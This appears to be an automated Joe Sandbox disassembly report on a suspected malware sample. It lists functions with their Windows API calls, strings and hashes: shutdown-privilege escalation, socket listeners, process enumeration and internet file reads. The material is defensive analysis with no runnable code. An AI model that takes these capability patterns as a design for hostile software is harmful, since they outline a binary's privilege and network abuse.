API String ID: 2649000838-1173974218
Opcode ID: 7de78a52ea4fbff9a8c60a4e00ccb66fda4080358cfeb6d90e7d59f116093ac0
Instruction ID: 75926e43679c88d642feadc10ebcc7250d23c8250fc773870d28254c7d063bd2
Opcode Fuzzy Hash: 7de78a52ea4fbff9a8c60a4e00ccb66fda4080358cfeb6d90e7d59f116093ac0
Instruction Fuzzy Hash: 52319271048384AFC305EF64C8918EFB7AAAE91304F400E1DF4D5922D1EB21EA09C797

Function 006651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065882B
Part of subcall function 006587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658858
Part of subcall function 006587E1: GetLastError.KERNEL32 ref: 00658865

ExitWindowsEx.USER32(?,00000000), ref: 006651F9

Strings

SeShutdownPrivilege, xrefs: 006651C9
@, xrefs: 006651EC
, xrefs: 006651E7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 6cfd101f2b53af23febb8c3f8c7600dc3ae992c70b5e3e660f16df7cd7c620b4
Instruction ID: 137a17659a1c297a08f828ccc121ad309e5966d6729dd3afb201b2d3d4877733
Opcode Fuzzy Hash: 6cfd101f2b53af23febb8c3f8c7600dc3ae992c70b5e3e660f16df7cd7c620b4
Instruction Fuzzy Hash: D901D4716A16116BE7286268ACBBFFA725EDB05341F200525F903E21D2D9511E018694

Function 00676283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006762DC
WSAGetLastError.WSOCK32(00000000), ref: 006762EB
bind.WSOCK32(00000000,?,00000010), ref: 00676307
listen.WSOCK32(00000000,00000005), ref: 00676316
WSAGetLastError.WSOCK32(00000000), ref: 00676330
closesocket.WSOCK32(00000000,00000000), ref: 00676344

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 2d53f071aa82da006d174939d15a14c36961c78b3c62edf6cc067302e73ca1e2
Instruction ID: 6cf8e905110b58dd8fe26698ab1c1a842ea7376e62567a010d1a86723d4e1d34
Opcode Fuzzy Hash: 2d53f071aa82da006d174939d15a14c36961c78b3c62edf6cc067302e73ca1e2
Instruction Fuzzy Hash: 2B21D070600600AFCB10EF64CC45A6EB7BBEF48320F148658F85AA73D2C770AD01CB61

Function 00615520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01

_memmove.LIBCMT ref: 00650258
_memmove.LIBCMT ref: 0065036D
_memmove.LIBCMT ref: 00650414

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 7e465b072d57475a24ad0852712cf7c48269cac5e593908453b936ea2cf1a3f3
Instruction ID: e962a8d074c3fd699061c2bfd1a6b8675b3a01239822ac71ee3269a89e2b36ac
Opcode Fuzzy Hash: 7e465b072d57475a24ad0852712cf7c48269cac5e593908453b936ea2cf1a3f3
Instruction Fuzzy Hash: FB02B0B0A00609DFDF04DF64D981AAEBBF6EF84300F148069E806DB395EB35D995CB95

Function 00601287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

DefDlgProcW.USER32(?,?,?,?,?), ref: 006019FA
GetSysColor.USER32(0000000F), ref: 00601A4E
SetBkColor.GDI32(?,00000000), ref: 00601A61

Part of subcall function 00601290: DefDlgProcW.USER32(?,00000020,?), ref: 006012D8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 8417db64f36e17ded44cb249fc6ad292dc78892c4a865f72a4ae3a359143f97d
Instruction ID: 41e4f3ab0293627cb7efab881b9eed9f1d8ad13443bea735f34a1531c00eb188
Opcode Fuzzy Hash: 8417db64f36e17ded44cb249fc6ad292dc78892c4a865f72a4ae3a359143f97d
Instruction Fuzzy Hash: B5A12771292544BAE72DAB688C58EFB355FDF43341F14121EF602DE2D2CB219D4293BA

Function 00676747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00677D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00677DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0067679E
WSAGetLastError.WSOCK32(00000000), ref: 006767C7
bind.WSOCK32(00000000,?,00000010), ref: 00676800
WSAGetLastError.WSOCK32(00000000), ref: 0067680D
closesocket.WSOCK32(00000000,00000000), ref: 00676821

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: eba8c7cbb6b7a86ab85bde9a990fbddb3b92086fdb4cf558c36d03725713c867
Instruction ID: 593c92e37625e4abe3f09660c2a1cb4384f387d0b8996aa5e77c4555fb500a87
Opcode Fuzzy Hash: eba8c7cbb6b7a86ab85bde9a990fbddb3b92086fdb4cf558c36d03725713c867
Instruction Fuzzy Hash: 3841D1B5A40600AFDB94AF24CC86F6F77AA9F45714F04C55CFA59AB3C3CA709D0087A5

Function 00685376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006853C5
IsWindowEnabled.USER32 ref: 006853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 006853E0
IsIconic.USER32 ref: 006853EE
IsZoomed.USER32 ref: 006853FC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 99c013932fa6e41bebbe405cf5cff636df2a02fbe954a95ff8796d9aff53caf1
Instruction ID: aa256e4db0d225360d1a2fd080ebc5e74ba91273ed4b8c1bbe7530ebc5dd0601
Opcode Fuzzy Hash: 99c013932fa6e41bebbe405cf5cff636df2a02fbe954a95ff8796d9aff53caf1
Instruction Fuzzy Hash: 9D11B231340911ABEB217F26DC44A6B7B9BEF447A1B408639F846D3241EBB09C0187A5

Function 006580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006580F6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
Instruction ID: d4f0e56a9bf304849225ed983a131a9258d1b2d74490abb205b9a8ee095cfab5
Opcode Fuzzy Hash: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
Instruction Fuzzy Hash: DBF04F31240305FFEB204FA5EC8DEA73BAEEF49755F100125F945D7250DA619C55DB60

Function 00604B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00604AD0), ref: 00604B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00604B57

Strings

GetNativeSystemInfo, xrefs: 00604B51
kernel32.dll, xrefs: 00604B40

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
Instruction ID: 337b9e34e9a30d50b8b5cea450c637e1e350789792f958f4598086302716e0f4
Opcode Fuzzy Hash: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
Instruction Fuzzy Hash: E1D01774A50713DFD720AF32E828B4676E6AF45791B12893A94C6D6290EBB4E880CB54

Function 0067EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0067EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0067EE4B

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Process32NextW.KERNEL32(00000000,?), ref: 0067EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0067EF1A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 27cc85e37a511526993b7d90b5735c94760366f006914a5b1936c3f1800766a4
Instruction ID: f1c58e0fc3451b7b85ac1b79b78f9892b2dbad1dd4c3978a56b18c86348750df
Opcode Fuzzy Hash: 27cc85e37a511526993b7d90b5735c94760366f006914a5b1936c3f1800766a4
Instruction Fuzzy Hash: 6C51C271504700AFD354EF20CC85EABB7EAEF88710F10492DF596972A1EB70E908CB96

Function 0065E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0065E628

Strings

|, xrefs: 0065E658
(, xrefs: 0065E66E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 68926a27438fd72a4dcb5206fb2ae7585dfc8f7d1f2921bf163498d22c9372c6
Instruction ID: 35f96696c3c72f12a8a93a9b8d36ac4acb9ac998109ecca3e58842c0a6b88055
Opcode Fuzzy Hash: 68926a27438fd72a4dcb5206fb2ae7585dfc8f7d1f2921bf163498d22c9372c6
Instruction Fuzzy Hash: 68321575A007059FDB28CF29C4819AAB7F1FF48310B15C56EE89ADB3A1E771A941CB44

Function 006722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0067180A,00000000), ref: 006723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00672418

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 117f2b4b0be722f27c448561edf12ec4883d9a1a90bf1363503ef2a008765ade
Instruction ID: 485952a1d2f23a8da9d083c060dbddc5cd0222ab3057aafb4ba27f6ddd6fa351
Opcode Fuzzy Hash: 117f2b4b0be722f27c448561edf12ec4883d9a1a90bf1363503ef2a008765ade
Instruction Fuzzy Hash: F341F67190420AFFEB20DE95DC91EFB77FEEB40324F10806EF649A7241EA749E419A54

Function 0066B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0066B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0066B3EA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 5f3b0f316d4075a2f9f4c70343dcbb3db54a0c36af1be3dd2f6bb8f698b46d28
Instruction ID: da2f4cff2a98f1005ea70d4145ecbd75e7586380040d2162607af313b4af5e68
Opcode Fuzzy Hash: 5f3b0f316d4075a2f9f4c70343dcbb3db54a0c36af1be3dd2f6bb8f698b46d28
Instruction Fuzzy Hash: 2621A175A00118EFCB00EFA5D885AEEBBBAFF49310F0485AAE905EB351CB319955CB54

Function 006587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658858
GetLastError.KERNEL32 ref: 00658865

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 00ca50b2ee9f313091aa6f0eb1fff093b42746ed90d3b9bae2617d2048481e18
Instruction ID: 3e2b6d62d54bf14bbc2fd453dd0625936b73594fcd48c65cc14c2fb73a4fcc4d
Opcode Fuzzy Hash: 00ca50b2ee9f313091aa6f0eb1fff093b42746ed90d3b9bae2617d2048481e18
Instruction Fuzzy Hash: 82119DB2404204AFE718DFA4EC85D6BB7AEEB44311B20852EE89693611EA30AC408B60

Function 0065874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00658774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0065878B
FreeSid.ADVAPI32(?), ref: 0065879B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
Instruction ID: aa3b3e7042c7456b74c257bc31048fb28d583567d41539cc7e1e385af1a81476
Opcode Fuzzy Hash: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
Instruction Fuzzy Hash: ACF06D75A1130CBFDF00DFF4DC99ABEBBBDEF08201F1045A9AA01E2281E7756A448B50

Function 00668889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0066889B

Part of subcall function 0062520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00668F6E,00000000,?,?,?,?,0066911F,00000000,?), ref: 00625213
Part of subcall function 0062520A: __aulldiv.LIBCMT ref: 00625233

Strings

0el, xrefs: 00668892

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0el
API String ID: 2893107130-2275708435
Opcode ID: 7cb4bfb82fc867074bb39682d08df62b0af21a6c7e775468fbee32dc40534911
Instruction ID: 00e7a5c0836fe4cd5e8d661bab939c2dd42ee88a6ff40f14c0dc5edc21f88edb
Opcode Fuzzy Hash: 7cb4bfb82fc867074bb39682d08df62b0af21a6c7e775468fbee32dc40534911
Instruction Fuzzy Hash: 7B21A2326256108FC729CF35D841AA2B3E2EBA5311B688F6CE0F5CB2C0CA34A905CB54

Function 00664C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00664CB3

Strings

DOWN, xrefs: 00664C98

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: a05ed801e58428589742fae66b27d86e5d608ef4cd889cc3ae24ba1811f833f5
Instruction ID: 789602c6c460c3ded71875bb31b517446d2dcbe50d58ec9c4958d2e847497a94
Opcode Fuzzy Hash: a05ed801e58428589742fae66b27d86e5d608ef4cd889cc3ae24ba1811f833f5
Instruction Fuzzy Hash: AEE04F7119972238E9442518BC02EFB028E8B123357120206FC10D52C1DD411C8225A9

Function 0066C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066C6FB
FindClose.KERNEL32(00000000), ref: 0066C72B

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a6a877d815ab360f0e1e153760900e0044212bc1e57ff876e0d8e0361b3b3d06
Instruction ID: 3751ca79e4c5536bdf5e475cab60145817185b134c4d36e2310936ca1f6074b8
Opcode Fuzzy Hash: a6a877d815ab360f0e1e153760900e0044212bc1e57ff876e0d8e0361b3b3d06
Instruction Fuzzy Hash: 09118E726006009FDB10DF29C855A2AF7EAEF85320F00CA1DF8A9C7391DB30AC05CB95

Function 0066A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00679468,?,0068FB84,?), ref: 0066A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00679468,?,0068FB84,?), ref: 0066A0A9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
